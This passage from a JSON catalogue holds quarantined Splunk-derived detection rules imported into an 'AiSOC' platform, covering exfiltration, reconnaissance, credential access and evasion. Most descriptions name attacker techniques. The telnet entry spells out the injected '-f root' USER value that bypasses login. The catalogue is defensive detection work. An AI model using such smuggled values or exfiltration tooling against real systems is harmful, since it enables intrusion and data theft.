This detection helps identify potential misuse or malicious activity where a user\u2019s access is revoked without proper authorization, providing insight into potential security incidents involving account management or session manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-logoff-user-via-quser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6d70780d-4cfe-4820-bafd-1b43941986b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_logoff_user_via_quser.yml" } }, { "id": "splunk-security-content-6dca1124-b3ec-11eb-9328-acde48001122", "type": "detection", "name": "Detect Renamed RClone", "description": "The following analytic detects the execution of a renamed `rclone.exe` process, which is commonly used for data exfiltration to remote destinations. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and original file names that do not match. This activity is significant because ransomware groups often use RClone to exfiltrate sensitive data. 
If confirmed malicious, this behavior could indicate an ongoing data exfiltration attempt, potentially leading to significant data loss and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-rclone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6dca1124-b3ec-11eb-9328-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_rclone.yml" } }, { "id": "splunk-security-content-6df99886-0e04-4c11-8b88-325747419278", "type": "detection", "name": "Linux Kernel Module Enumeration", "description": "The following analytic identifies the use of the 'kmod' process to list kernel modules on a Linux system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. While listing kernel modules is not inherently malicious, it can be a precursor to loading unauthorized modules using 'insmod'. 
If confirmed malicious, this activity could allow an attacker to load kernel modules, potentially leading to privilege escalation, persistence, or other malicious actions within the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-kernel-module-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6df99886-0e04-4c11-8b88-325747419278", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_kernel_module_enumeration.yml" } }, { "id": "splunk-security-content-6e0913d4-5461-487c-9dce-6d22ef2c0f03", "type": "detection", "name": "Linux Telnet Authentication Bypass", "description": "Detects an authentication bypass in telnet tracked as CVE-2026-24061. An attacker can supply a specifically crafted USER environment variable (-f root) that is passed to /usr/bin/login. 
Because this input isn't sanitized, an attacker can force the system to skip authentication and log in directly as root.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-telnet-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e0913d4-5461-487c-9dce-6d22ef2c0f03", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_telnet_authentication_bypass.yml" } }, { "id": "splunk-security-content-6e1ad5d4-d9af-496a-96ec-f31c11cd09f2", "type": "detection", "name": "Windows Outlook WebView Registry Modification", "description": "The following analytic identifies modifications to specific Outlook registry values related to WebView and Today features. It detects when a URL is set in these registry locations, which could indicate attempts to manipulate Outlook's web-based components. The analytic focuses on changes to the \"URL\" value within Outlook's WebView and Today registry paths. This activity is significant as it may represent an attacker's effort to redirect Outlook's web content or inject malicious URLs. 
If successful, this technique could lead to phishing attempts, data theft, or serve as a stepping stone for further compromise of the user's email client and potentially sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-webview-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e1ad5d4-d9af-496a-96ec-f31c11cd09f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_webview_registry_modification.yml" } }, { "id": "splunk-security-content-6e1ada88-7a0d-4ac1-92c6-03d354686079", "type": "detection", "name": "Detect Rogue DHCP Server", "description": "The following analytic identifies the presence of unauthorized DHCP servers on the network. It leverages logs from Cisco network devices with DHCP Snooping enabled, specifically looking for events where DHCP leases are issued from untrusted ports. This activity is significant because rogue DHCP servers can facilitate Man-in-the-Middle attacks, leading to potential data interception and network disruption. 
If confirmed malicious, this could allow attackers to redirect network traffic, capture sensitive information, and compromise the integrity of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rogue-dhcp-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e1ada88-7a0d-4ac1-92c6-03d354686079", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_rogue_dhcp_server.yml" } }, { "id": "splunk-security-content-6e2574b3-e24b-4321-ae3c-ba83a75bb714", "type": "detection", "name": "Linux Auditd Auditd Daemon Shutdown", "description": "The following analytic detects the unexpected termination of the Linux Audit daemon (auditd) by monitoring for log entries of type DAEMON_END. This event signifies that the audit logging service has stopped, either due to a legitimate system shutdown, manual administrative action, or potentially malicious tampering. Since auditd is responsible for recording critical security events, its sudden stoppage may indicate an attempt to disable security monitoring or evade detection during an attack. This detection should be correlated with system logs to determine whether the shutdown was part of routine maintenance or an anomaly. If confirmed as malicious, this could lead to a compromised system where security events are no longer being logged, allowing attackers to operate undetected. 
Therefore, monitoring and alerting on auditd shutdown events is crucial for maintaining the integrity of system security monitoring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e2574b3-e24b-4321-ae3c-ba83a75bb714", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_shutdown.yml" } }, { "id": "splunk-security-content-6e4c4588-ba2f-42fa-97e6-9f6f548eaa33", "type": "detection", "name": "Shim Database File Creation", "description": "The following analytic detects the creation of shim database files (.sdb) in default directories using the sdbinst.exe application. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify file writes to the Windows\\AppPatch\\Custom directory. This activity is significant because shims can intercept and alter API calls, potentially allowing attackers to bypass security controls or execute malicious code. 
If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shim-database-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e4c4588-ba2f-42fa-97e6-9f6f548eaa33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shim_database_file_creation.yml" } }, { "id": "splunk-security-content-6e5a3ae4-90a3-462d-9aa6-0119f638c0f1", "type": "detection", "name": "Hiding Files And Directories With Attrib exe", "description": "The following analytic detects the use of the Windows binary attrib.exe to hide files or directories by marking them with specific flags. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments that include the \"+h\" flag. This activity is significant because hiding files can be a tactic used by attackers to conceal malicious files or tools from users and security software. 
If confirmed malicious, this behavior could allow an attacker to persist in the environment undetected, potentially leading to further compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hiding-files-and-directories-with-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e5a3ae4-90a3-462d-9aa6-0119f638c0f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml" } }, { "id": "splunk-security-content-6e9d4f7a-3c8b-4a9e-8d2f-7b5c9e1a6f3d", "type": "detection", "name": "Cisco ASA - Reconnaissance Command Activity", "description": "This analytic detects potential reconnaissance activities on Cisco ASA devices by identifying execution of multiple information-gathering \"show\" commands within a short timeframe.\nAdversaries who gain initial access to network infrastructure devices typically perform systematic reconnaissance to understand the device configuration, network topology, security policies, connected systems, and potential attack paths. 
This reconnaissance phase involves executing multiple \"show\" commands to enumerate device details, running configurations, active connections, routing information, and VPN sessions.\nThe detection monitors for command execution events (message ID 111009) containing reconnaissance-oriented \"show\" commands (such as show running-config, show version, show interface, show crypto, show conn, etc.) and triggers when 7 or more distinct reconnaissance commands are executed within a 5-minute window by the same user.\nInvestigate reconnaissance bursts from non-administrative accounts, unusual source IP addresses, activity during off-hours, methodical command sequences suggesting automated enumeration, or reconnaissance activity correlated with other suspicious behaviors.\nWe recommend adapting the detection filters to exclude known legitimate administrative activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1590.001", "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-reconnaissance-command-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e9d4f7a-3c8b-4a9e-8d2f-7b5c9e1a6f3d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___reconnaissance_command_activity.yml" } }, { "id": "splunk-security-content-6ece9ed0-5f92-4315-889d-48560472b188", "type": "detection", "name": "Windows Access Token Manipulation SeDebugPrivilege", "description": "The following analytic detects a process enabling the 
\"SeDebugPrivilege\" privilege token. It leverages Windows Security Event Logs with EventCode 4703, filtering out common legitimate processes. This activity is significant because SeDebugPrivilege allows a process to inspect and modify the memory of other processes, potentially leading to credential dumping or code injection. If confirmed malicious, an attacker could gain extensive control over system processes, enabling them to escalate privileges, persist in the environment, or access sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-manipulation-sedebugprivilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ece9ed0-5f92-4315-889d-48560472b188", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_manipulation_sedebugprivilege.yml" } }, { "id": "splunk-security-content-6ed33786-5e87-4f55-b62c-cb5f1168b831", "type": "detection", "name": "Suspicious Java Classes", "description": "The following analytic identifies suspicious Java classes often used for remote command execution exploits in Java frameworks like Apache Struts.\nIt detects this activity by analyzing HTTP POST requests with specific content patterns using Splunk's `stream_http` data source.\nThis behavior is significant because it may indicate an attempt to exploit vulnerabilities in web applications, potentially leading to unauthorized remote code execution.\nIf 
confirmed malicious, this activity could allow attackers to execute arbitrary commands on the server, leading to data breaches, system compromise, and further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-java-classes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ed33786-5e87-4f55-b62c-cb5f1168b831", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/suspicious_java_classes.yml" } }, { "id": "splunk-security-content-6f3ccfa2-91fe-11eb-8f9b-acde48001122", "type": "detection", "name": "Disable Show Hidden Files", "description": "The following analytic detects modifications to the Windows registry that disable the display of hidden files. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with hidden file settings. This activity is significant because malware, such as worms and trojan spyware, often use hidden files to evade detection. 
If confirmed malicious, this behavior could allow an attacker to conceal malicious files on the system, making it harder for security tools and analysts to identify and remove the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001", "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-show-hidden-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f3ccfa2-91fe-11eb-8f9b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_show_hidden_files.yml" } }, { "id": "splunk-security-content-6f42b8be-8e96-11ec-ad5a-acde48001122", "type": "detection", "name": "Windows Rasautou DLL Execution", "description": "The following analytic detects the execution of an arbitrary DLL by the Windows Remote Auto Dialer (rasautou.exe). This behavior is identified by analyzing process creation events where rasautou.exe is executed with specific command-line arguments. This activity is significant because it leverages a Living Off The Land Binary (LOLBin) to execute potentially malicious code, bypassing traditional security controls. 
If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rasautou-dll-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f42b8be-8e96-11ec-ad5a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rasautou_dll_execution.yml" } }, { "id": "splunk-security-content-6f6c8fd7-6a6b-4af9-a0e9-57cfc47a58b4", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Authenticate Using NTLM", "description": "The following analytic identifies a source endpoint failing to authenticate multiple valid users using the NTLM protocol, potentially indicating a Password Spraying attack. It leverages Event 4776 from Domain Controllers, calculating the standard deviation for each host and applying the 3-sigma rule to detect anomalies. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges. 
If confirmed malicious, the attacker could compromise multiple accounts, leading to unauthorized access and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-authenticate-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f6c8fd7-6a6b-4af9-a0e9-57cfc47a58b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_authenticate_using_ntlm.yml" } }, { "id": "splunk-security-content-6fa0073d-6ca0-4f93-913d-fb420c9de15b", "type": "detection", "name": "ESXi Sensitive Files Accessed", "description": "This detection identifies access to sensitive system and configuration files on an ESXi host, including authentication data, service configurations, and VMware-specific management settings. 
Interaction with these files may indicate adversary reconnaissance, credential harvesting, or preparation for privilege escalation, lateral movement, or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-sensitive-files-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fa0073d-6ca0-4f93-913d-fb420c9de15b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_sensitive_files_accessed.yml" } }, { "id": "splunk-security-content-6fa31414-546e-11ec-adfa-acde48001122", "type": "detection", "name": "Short Lived Scheduled Task", "description": "The following analytic detects the creation and deletion of scheduled tasks within a short time frame (less than 30 seconds) using Windows Security EventCodes 4698 and 4699. This behavior is identified by analyzing Windows Security Event Logs and leveraging the Windows TA for parsing. Such activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, or execution of malicious payloads, necessitating prompt investigation and response by security analysts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/short-lived-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fa31414-546e-11ec-adfa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/short_lived_scheduled_task.yml" } }, { "id": "splunk-security-content-6fc46cae-a8c0-4296-b07a-8e52d4322587", "type": "detection", "name": "Windows Wmic CPU Discovery", "description": "The following analytic detects the use of WMIC (Windows Management Instrumentation Command-line) for CPU discovery, often executed with commands such as \u201cwmic cpu get name\u201d. This behavior is commonly associated with reconnaissance, where adversaries seek to gather details about system hardware, assess processing power, or determine if the environment is virtualized. While WMIC is a legitimate administrative tool, its use for CPU queries outside of normal inventory or management scripts can indicate malicious intent. 
Monitoring command-line executions of WMIC with CPU-related arguments and correlating with other discovery activity can help identify attacker reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-cpu-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fc46cae-a8c0-4296-b07a-8e52d4322587", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_cpu_discovery.yml" } }, { "id": "splunk-security-content-6fe42e07-15b1-4caa-b547-7885666cb1bd", "type": "detection", "name": "Microsoft Intune Device Health Scripts", "description": "Microsoft Intune device remediation scripts are a tool administrators can use to remotely manage devices; this functionality can also be abused for SYSTEM-level code execution and lateral movement to Intune-managed devices. 
This detection identifies when a new device health script has been added, updated or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1021.007", "T1202", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-device-health-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fe42e07-15b1-4caa-b547-7885666cb1bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_device_health_scripts.yml" } }, { "id": "splunk-security-content-6ffc7f88-415b-4278-a80d-b957d6539e1a", "type": "detection", "name": "Windows SIP WinVerifyTrust Failed Trust Validation", "description": "The following analytic detects failed trust validation attempts using Windows Event Log - CAPI2 (CryptoAPI 2). It specifically triggers on EventID 81, which indicates that \"The digital signature of the object did not verify.\" This detection leverages the CAPI2 Operational log to identify instances where digital signatures fail to validate. Monitoring this activity is crucial as it can indicate attempts to execute untrusted or potentially malicious binaries. 
If confirmed malicious, this activity could allow attackers to bypass security controls and execute unauthorized code, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sip-winverifytrust-failed-trust-validation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ffc7f88-415b-4278-a80d-b957d6539e1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sip_winverifytrust_failed_trust_validation.yml" } }, { "id": "splunk-security-content-700c11d1-da09-47b2-81aa-358c143c7986", "type": "detection", "name": "Windows AD GPO New CSE Addition", "description": "This detection identifies when a new client-side extension (CSE) is added to an Active Directory Group Policy Object using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-new-cse-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "700c11d1-da09-47b2-81aa-358c143c7986", "source_commit": "4d4c7ee", "license": 
"Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_gpo_new_cse_addition.yml" } }, { "id": "splunk-security-content-701a8740-e8db-40df-9190-5516d3819787", "type": "detection", "name": "Sunburst Correlation DLL and Network Event", "description": "The following analytic identifies the loading of the malicious SolarWinds.Orion.Core.BusinessLayer.dll by SolarWinds.BusinessLayerHost.exe and subsequent DNS queries to avsvmcloud.com. It uses Sysmon EventID 7 for DLL loading and Event ID 22 for DNS queries, correlating these events within a 12-14 day period. This activity is significant as it indicates potential Sunburst malware infection, a known supply chain attack. If confirmed malicious, this could lead to unauthorized network access, data exfiltration, and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sunburst-correlation-dll-and-network-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "701a8740-e8db-40df-9190-5516d3819787", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sunburst_correlation_dll_and_network_event.yml" } }, { "id": "splunk-security-content-70803451-0047-4e12-9d63-77fa7eb8649c", "type": "detection", "name": "Remote System Discovery with Adsisearcher", "description": "The following analytic detects the use of the 
`[Adsisearcher]` type accelerator in PowerShell scripts to query Active Directory for domain computers. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks containing `adsisearcher` and `objectcategory=computer` with methods like `findAll()` or `findOne()`. This activity is significant as it may indicate an attempt by adversaries or Red Teams to perform Active Directory discovery and gain situational awareness. If confirmed malicious, this could lead to further reconnaissance and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-adsisearcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70803451-0047-4e12-9d63-77fa7eb8649c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_adsisearcher.yml" } }, { "id": "splunk-security-content-70a050a2-8537-488a-a628-b60a9558d96a", "type": "detection", "name": "O365 Email Send Attachments Excessive Volume", "description": "The following analytic identifies when an O365 email account sends an excessive number of email attachments to external recipients within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to exfiltrate data from the mailbox. 
Threat actors may attempt to transfer data through email as a simple means of exfiltration from the compromised mailbox. Some legitimate account-owner behaviors can trigger this alert; however, those actions may not be aligned with organizational expectations or best-practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-attachments-excessive-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70a050a2-8537-488a-a628-b60a9558d96a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_attachments_excessive_volume.yml" } }, { "id": "splunk-security-content-70f7c952-0758-46d6-9148-d8969c4481d1", "type": "detection", "name": "Windows Gather Victim Network Info Through Ip Check Web Services", "description": "The following analytic detects processes attempting to connect to known IP check web services. This behavior is identified using Sysmon EventCode 22 logs, specifically monitoring DNS queries to services like \"wtfismyip.com\" and \"ipinfo.io\". This activity is significant as it is commonly used by malware, such as Trickbot, for reconnaissance to determine the infected machine's IP address. 
